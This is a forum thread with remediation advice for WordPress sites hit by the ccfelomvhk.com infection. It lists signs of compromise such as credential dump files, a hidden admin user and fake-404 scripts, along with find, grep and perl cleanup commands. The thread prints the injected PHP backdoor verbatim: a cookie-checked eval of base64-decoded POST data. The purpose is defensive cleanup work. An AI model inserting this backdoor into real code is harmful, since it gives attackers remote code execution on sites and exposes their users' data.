ccfelomvhk virus on WordPress based sites


Invisible

Invisible

Admin
Joined
Feb 11, 2006
Messages
9,106
Likes
589
Points
280
Invisible

Invisible

Admin
Joined Feb 11, 2006
9,106 589 280
Hello buddies, there's this virus ccfelomvhk.com that's attacking so many sites. Your site will be attempting to download a virus, you need to get your space swept!

This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

Try to do this:

1. Keep searching for wp-info.txt to make sure it's not around, if so, delete it.

find . -name wp-info* 2. get rid of all _new _old .jpgg .giff and .pngg
find . -name *_old* -exec rm '{}' \;

3. find all instances of the backdoor account looks like

<?php if(md5($_COOKIE['_wp_debugger'])=="randomhash"){ Use grep to find this:
grep -ri _wp_debugger * *.php Then do a global search and replace (for now) to replace _wp_debugger with 'unknown'
find . -name '*.php' | xargs perl -pi -e 's/_wp_debugger/unknown/'

4. Upgrade all installations to 2.5

5. Use phpmyadmin to remove the hidden 'wordpress' user account from the wp_users table in the database

6. Reset all user passwords by replacing the MD5 hash through the database directly.


All doesn't work?

Probably follow this:
Extra code added to the first line of PHP files
<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>
Note that the letters numbers and numbers vary.
Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.
New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories
See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.
Solution: delete the files.
New files named wp-info.txt which contain database usernames and passwords
This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.
Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.
New “WordPress” user in database (hidden in the admin panel users page)
One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.
Solution: delete the user. You need to access your database through phpMyAdmin or something similar.
WordPress version changed to 2.5
I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.
Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.
More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.
More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.
 
Steve Dii

Steve Dii

JF-Expert Member
Joined
Jun 25, 2007
Messages
6,419
Likes
79
Points
145
Steve Dii

Steve Dii

JF-Expert Member
Joined Jun 25, 2007
6,419 79 145
If you have got a WordPress based user content management system, i think it's best not to allow anonymous posting of comments from your website visitors, I know there is no silver bullet solution to this, but at least in that way you can to SOME POINT limit spammers and some attacks similar to above.

SteveD.
 
Invisible

Invisible

Admin
Joined
Feb 11, 2006
Messages
9,106
Likes
589
Points
280
Invisible

Invisible

Admin
Joined Feb 11, 2006
9,106 589 280
A Trojan program will try to reach your pc once you visit an infected site:

Trojan name: Trojan-Clicker.HTML.IFrame.od

Target: wp-includes/js/thickbox/loadingAnimation.gif
 
Steve Dii

Steve Dii

JF-Expert Member
Joined
Jun 25, 2007
Messages
6,419
Likes
79
Points
145
Steve Dii

Steve Dii

JF-Expert Member
Joined Jun 25, 2007
6,419 79 145
A Trojan program will try to reach your pc once you visit an infected site:

Trojan name: Trojan-Clicker.HTML.IFrame.od

Target: wp-includes/js/thickbox/loadingAnimation.gif
......it is about time people revisited this thread: Viruses, malware, spyware, trojans Updates

..... and specifically on that thread, i highlighted on the following post the emergence of 'iFrame' attacks: http://www.jamboforums.com/showpost.php?p=168126&postcount=69


....be wary people!!! :(

SteveD.
 

Forum statistics

Threads 1,213,377
Members 462,055
Posts 28,475,930